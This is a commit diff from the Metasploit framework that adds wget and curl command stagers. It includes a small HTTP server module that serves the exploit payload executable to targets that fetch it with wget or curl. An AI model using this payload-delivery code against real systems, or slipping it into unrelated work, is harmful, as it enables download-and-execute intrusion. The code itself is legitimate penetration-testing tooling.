Land #7758, Add HTTP CmdStagers - wget and curl
Brent Cook
commit
d2624ef574
|
|
@ -250,7 +250,7 @@ GEM
|
|||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.4)
|
||||
rex-exploitation (0.1.7)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
|
|
|
|||
|
|
@ -1,8 +1,7 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/exploitation/cmdstager'
|
||||
require 'msf/core/exploit/exe'
|
||||
require 'msf/base/config'
|
||||
require 'msf/core/exploit/cmdstager/http'
|
||||
|
||||
module Msf
|
||||
|
||||
|
|
@ -10,6 +9,7 @@ module Msf
|
|||
module Exploit::CmdStager
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::CmdStager::Http
|
||||
|
||||
# Constant for stagers - used when creating an stager instance.
|
||||
STAGERS = {
|
||||
|
|
@ -21,7 +21,9 @@ module Exploit::CmdStager
|
|||
:vbs => Rex::Exploitation::CmdStagerVBS,
|
||||
:vbs_adodb => Rex::Exploitation::CmdStagerVBS,
|
||||
:certutil => Rex::Exploitation::CmdStagerCertutil,
|
||||
:tftp => Rex::Exploitation::CmdStagerTFTP
|
||||
:tftp => Rex::Exploitation::CmdStagerTFTP,
|
||||
:wget => Rex::Exploitation::CmdStagerWget,
|
||||
:curl => Rex::Exploitation::CmdStagerCurl
|
||||
}
|
||||
|
||||
# Constant for decoders - used when checking the default flavor decoder.
|
||||
|
|
@ -124,6 +126,11 @@ module Exploit::CmdStager
|
|||
end
|
||||
|
||||
self.stager_instance = create_stager
|
||||
|
||||
if stager_instance.respond_to?(:http?) && stager_instance.http?
|
||||
opts[:payload_uri] = start_service(opts)
|
||||
end
|
||||
|
||||
cmd_list = stager_instance.generate(opts_with_decoder(opts))
|
||||
|
||||
if cmd_list.nil? || cmd_list.length.zero?
|
||||
|
|
|
|||
|
|
@ -0,0 +1,38 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core/exploit/tcp_server'
|
||||
require 'msf/core/exploit/http/server'
|
||||
|
||||
module Msf::Exploit::CmdStager
|
||||
module Http
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive
|
||||
))
|
||||
end
|
||||
|
||||
def start_service(opts = {})
|
||||
datastore_ssl = datastore['SSL']
|
||||
datastore['SSL'] = !!opts[:ssl]
|
||||
|
||||
super
|
||||
|
||||
payload_uri = get_uri
|
||||
datastore['SSL'] = datastore_ssl
|
||||
|
||||
payload_uri
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if request['User-Agent'] =~ /^(?:Wget|curl)/
|
||||
send_response(cli, exe)
|
||||
else
|
||||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
Loading…
Reference in New Issue